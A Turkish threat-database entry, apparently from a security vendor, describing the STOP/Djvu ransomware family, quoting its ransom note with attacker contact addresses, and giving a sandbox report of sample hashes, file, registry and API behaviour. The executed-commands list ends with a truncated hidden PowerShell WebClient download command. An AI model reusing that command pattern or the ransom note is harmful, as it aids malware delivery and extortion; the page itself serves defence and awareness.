Çoklu Lisans İndirim Teklifi

Bölge değiştir

English Dansk Deutsch Español Français Italiano Nederlands Polski Português Svenska Türkçe Русский हिन्दी 日本語 汉语 漢語 한국어
Tehdit Veritabanı Fidye yazılımı Djvu Fidye Yazılımını DURDUR

Djvu Fidye Yazılımını DURDUR

GoldSparrow'de Fidye yazılımı'de
Çevir:

STOP Djvu Ransomware ailesi olarak da adlandırılan STOP Ransomware ailesi, tehdit edici bir kötü amaçlı yazılım parçasıdır. STOP Djvu, dosya türlerini etkileme ve dosya uzantılarını şifreleme yöntemlerinin bazıları farklı olsa da, ortak özellikleri paylaşan ve STOP fidye yazılımından kaynaklanan çoklu tehditlerden yalnızca biridir.

Orijinal STOP Fidye Yazılımı, güvenlik araştırmacıları tarafından Şubat 2018 gibi erken bir tarihte fark edildi. Ancak o zamandan beri gelişti ve klonları ve yan dalları ailesi büyüdü. STOP fidye yazılımının birincil dağıtım yöntemi, bozuk ekler kullanan spam e-posta kampanyalarıydı.

STOP Djvu Fidye Yazılımı, kendi türündeki diğer fidye yazılımı tehditlerine benzer şekilde çalışır ve kullanıcıların sistemlerinde kullanıyor olabilecekleri anahtar dosyalara erişimi şifreler ve engeller. Kişisel dosyalar, resimler, belgeler ve daha fazlası şifrelenebilir ve makinedeki tüm kullanıcılar için esasen devre dışı bırakılabilir. STOP Djvu Ransomware, ilk olarak Aralık 2018'de, çevrimiçi olarak oldukça başarılı bir enfeksiyon kampanyası olarak görüldü. Araştırmacılar fidye yazılımının nasıl yayıldığının farkında değillerdi, ancak daha sonra kurbanlar keygen veya crack indirdikten sonra enfeksiyonlar keşfettiklerini bildirdiler. Sızma gerçekleştiğinde, STOP Djvu fidye yazılımı Windows ayarlarını değiştirerek .djvu, .djvus, .djvuu, .uudjvu, .udjvu veya .djvuq ve en son .promorad ve .promock uzantıları gibi bir dizi adla dosyalar ekler. Daha yeni sürümlerin henüz bir şifre çözücüsü yoktur, ancak eski sürümlerin şifresi STOPDecrypter kullanılarak çözülebilir. Kullanıcılara, ne olursa olsun herhangi bir fidye ödemekten kaçınmaları tavsiye edilir.

Dosyalara erişimi engellemek için kullanılan yöntem, RSA şifreleme algoritmasını kullanır. Deneyimsiz kullanıcılar için dosyaların şifresini çözmek zor görünse de, kesinlikle tehdidin arkasındaki kişilere ödeme yapmak için herhangi bir çaba sarf etmeye gerek yoktur. Bu gibi durumlarda genellikle yanlış vaatler verilir, bu nedenle kullanıcılar ödeme yapıldıktan sonra göz ardı edildiklerini çabucak öğrenebilirler.

STOP Djvu Fidye Yazılımının saldırıları ilk olarak 2018'in sonlarında rapor edildi. STOP Djvu'nun ana dağıtım yöntemi spam e-postalar olarak kaldı ve fidye yazılımının özüne yönelik ince ayarlar nispeten küçüktü. İstenmeyen e-postalarda kullanılan sahte, güvenliği ihlal edilmiş eklerin çoğu, kurbanın bilgisi olmadan fidye yazılımını çalıştıracak makro etkin ofis belgeleri veya sahte PDF dosyalarıydı. STOP Djvu'nun davranışı da pek değişmedi - fidye yazılımı hala tüm Shadow Volume anlık görüntülerini yedeklerden kurtulmak için siliyor, ardından kurbanın dosyalarını şifrelemeye başlıyor.

Kurbanın masaüstüne '_openme.txt' olarak kaydedilen fidye notunda küçük değişiklikler var. Fidye notunun metni burada bulunabilir:

'[fidye notu başlangıcı]
———————— TÜM DOSYALARINIZ ŞİFRELİ ————————

Merak etmeyin, tüm dosyalarınızı geri verebilirsiniz!
Tüm dosyalarınız, belgeleriniz, fotoğraflarınız, veritabanlarınız ve diğer önemli, en güçlü şifreleme ve benzersiz anahtarla şifrelenir.
Dosyaları kurtarmanın tek yöntemi, sizin için şifre çözme aracı ve benzersiz anahtar satın almaktır.
Bu yazılım tüm şifrelenmiş dosyalarınızın şifresini çözecektir.
Size hangi garantileri veriyoruz?
Bilgisayarınızdan şifreli dosyanızdan birini gönderebilirsiniz ve biz de şifresini ücretsiz çözelim.
Ancak sadece 1 dosyanın şifresini ücretsiz olarak çözebiliriz. Dosya değerli bilgiler içermemelidir
Dosyalarınızı yok edeceğinden üçüncü taraf şifre çözme araçlarını kullanmaya çalışmayın.
İlk 72 saat bizimle iletişime geçerseniz %50 indirim mevcuttur.

——————————————————————————————————

Bu yazılımı edinmek için e-postamıza yazmanız gerekir:
helpshadow@india.com

Bizimle iletişime geçmek için e-posta adresini rezerve edin:
helpshadow@firemail.cc

Kişisel kimliğiniz: [string]
[fidye notu sonu]'

Fidye yazılımı, şifrelenmiş dosyaları orijinal olarak .djvu uzantısıyla yeniden adlandırmakla sınırladı; bu ilginç bir seçimdi çünkü .djvu aslında AT&T Labs tarafından geliştirilen ve taranan belgeleri depolamak için kullanılan, Adobe'nin .pdf dosyasına benzer şekilde yasal bir dosya biçimidir. Fidye yazılımının sonraki sürümleri, şifrelenmiş dosyalar için '.chech', '.luceq,' '.kroput1,' '.charck', '.kropun,' .luces,' '.pulsar1, dahil olmak üzere bir dizi başka uzantı benimsedi. ' '.uudjvu', '.djvur', '.tfude', '.tfudeq' ve '.tfudet'.

STOP Djvu fidye yazılımının belirli türlerinin şifresi, güvenlik araştırmacısı Michael Gillespie tarafından geliştirilen ve çevrimiçi olarak ücretsiz olarak indirilebilen 'STOPDecrypter' adı verilen yazılım kullanılarak ücretsiz olarak çözülebilir.

Djvu Fidye Yazılımını DURDUR Video

İpucu: Sesi AÇIN ve videoyu Tam Ekran modunda izleyin .

Djvu Fidye Yazılımını DURDUR Ekran Görüntüsü

stop djvu ransomware note

Analiz raporu

Genel bilgi

Family Name: STOP/DJVU Ransomware
Signature status: Self Signed

Known Samples

MD5: def8a7bfe5fe47d95a95085d8dbc7a53
SHA1: 7182d4b2f55a560d83edf0824e119f71fa8422b6
SHA256: B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192
Dosya boyutu: 6.29 MB, 6292105 bytes
MD5: a6b8c0cb178c31dd347554c3e5a0d5f8
SHA1: 91864f269d696ee80869cfeb3c9a204f8031a3bb
SHA256: 4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C
Dosya boyutu: 3.47 MB, 3471869 bytes
MD5: 2336c9624d9a44c393d354206226f508
SHA1: ea7edc388ad62990f52b9ed40df26d20f4e20190
SHA256: CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0
Dosya boyutu: 1.36 MB, 1359918 bytes
MD5: 42f32aa699bc45a3638ddeb325ebebc1
SHA1: 508cea3ba2bf04cc6851295f92bf0e752071f6b8
SHA256: 16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4
Dosya boyutu: 1.33 MB, 1328186 bytes
MD5: 2391d41548b6432191f73edefa273928
SHA1: 620b714f84955aa7fb9a2f2cd528daa1621e18af
SHA256: 4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959
Dosya boyutu: 3.36 MB, 3357556 bytes
Show More
MD5: 710c3a1beb616d4aa7d5ed9a7f8848e4
SHA1: 326da9ddc0ea840e83f31fbf1f3377a06c911fe5
SHA256: 051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB
Dosya boyutu: 1.36 MB, 1364106 bytes
MD5: 601b120a6f39f72847b2f581a3d5f158
SHA1: 0cc5781c1cfe6c5d034bd098229773e80e083732
SHA256: BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818
Dosya boyutu: 4.86 MB, 4858569 bytes
MD5: a7b76a49f289081961f8f3824f0b62ca
SHA1: 6908790199785be7fc6c4eeb1fe426ee1b66cc0b
SHA256: 1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45
Dosya boyutu: 1.41 MB, 1406899 bytes
MD5: 9f37930d62a1e08f68aa0a72472e7a55
SHA1: 27706b3ff639e5dfa264a823dbe9229cf34ae153
SHA256: 29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F
Dosya boyutu: 600.12 KB, 600124 bytes
MD5: 7a18839fe61e9cde0e8fea3100acfb2b
SHA1: 9476c97a73e027016e9f6f2f20c2fb19264cd837
SHA256: 0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF
Dosya boyutu: 316.83 KB, 316832 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File has exports table
  • File has TLS information
  • File is 32-bit executable
  • File is 64-bit executable
  • File is either console or GUI application
Show More
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

isim Değer
Assembly Version 1.4.1.0
Comments This installation was built with Inno Setup.
Company Name
  • Alexander Roshal
  • TrayToolbar
  • WinTools Software Engineering, Ltd.
File Description
  • Archiwizer WinRAR
  • Gestione archivi WinRAR
  • RAM Saver Professional
  • TrayToolbar
  • WinRAR 5.60 64 Bit Setup
  • WinRAR Installer
File Version
  • 26.2.1
  • 26.0.1
  • 25.7.1
  • 25.4.1
  • 6.20.2
  • 6.2.0
  • 1.4.1.0
  • 1.3.0.0
  • 1.00
Internal Name
  • TJprojMain
  • TrayToolbar.dll
  • WinRAR
Legal Copyright
  • Copyright © Alexander Roshal 1993-2021
  • Copyright © Alexander Roshal 1993-2022
  • Copyright © Alexander Roshal 1993-2025
  • © Brontech, LLC
Original Filename
  • TJprojMain.exe
  • TrayToolbar.dll
  • WinRAR.exe
Product Name
  • Project1
  • RAM Saver 25.4.1 Professional
  • RAM Saver 25.7.1 Professional
  • RAM Saver 26.0.1 Professional
  • RAM Saver 26.2.1 Professional
  • TrayToolbar
  • WinRAR
  • WinRAR 5.60 64 Bit
  • WinRAR Installer
Product Version
  • 26.2.1
  • 26.0.1
  • 25.7.1
  • 25.4.1
  • 6.20.2
  • 6.2.0
  • 5.60
  • 1.4.1+80dec33e25323db7125ddec35b475aa881292801
  • 1.4.0
  • 1.00

Digital Signatures

Signer Root Status
win.rar GmbH DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 Self Signed
win.rar GmbH GlobalSign CodeSigning CA - SHA256 - G3 Hash Mismatch

File Traits

  • .NET
  • 2+ executable sections
  • big overlay
  • HighEntropy
  • Inno
  • InnoSetup Installer
  • Installer Manifest
  • Installer Version
  • MZ (In Overlay)
  • No Version Info
Show More
  • Nullsoft Installer
  • RAR (In Overlay)
  • RARinO
  • Run
  • SusSec
  • vb6
  • WinRAR SFX
  • WRARSFX
  • x64
  • x86

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
Show More
c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\system.dll Generic Write,Read Attributes

Registry Modifications

Key::Value Veri API Name
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 졷鑂셱ǜ RegNtPreCreateKey

Windows API Usage

Category API
Other Suspicious
  • SetWindowsHookEx
Anti Debug
  • IsDebuggerPresent
  • OutputDebugString
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Manipulation Evasion
  • NtUnmapViewOfSection
  • ZwMapViewOfSection
Process Shell Execute
  • CreateProcess
Keyboard Access
  • GetKeyState
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
Show More
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtUnmapViewOfSection
  • ntdll.dll!NtUnmapViewOfSectionEx
  • ntdll.dll!NtWaitForAlertByThreadId
  • ntdll.dll!NtWaitForMultipleObjects
  • ntdll.dll!NtWaitForSingleObject
  • ntdll.dll!NtWaitForWorkViaWorkerFactory
  • ntdll.dll!NtWaitLowEventPair
  • ntdll.dll!NtWorkerFactoryWorkerReady
  • ntdll.dll!NtWriteFile
  • UNKNOWN
Encryption Used
  • BCryptOpenAlgorithmProvider

Shell Command Execution

"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"
"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"
"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"
"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"
"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"
Show More
powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient

trend

Hesabınız Güvenli ve Hazır E-posta Dolandırıcılığı

Kimlik avı, İstenmeyen e-posta
Hesap güvenliğini doğrulayan beklenmedik e-postalar yanıltıcı bir şekilde güven verici olabilir, ancak onları tehlikeli kılan da tam olarak budur. Siber güvenlik uzmanları, özellikle hesap bilgilerini içeren istenmeyen mesajlarla ilgili olarak kullanıcıların her zaman tetikte olmaları gerektiğini vurgulamaktadır. "Hesabınız Güvenli ve Hazır" e-posta dolandırıcılığı, saldırganların güveni ve...

En çok görüntülenen

Yükleniyor...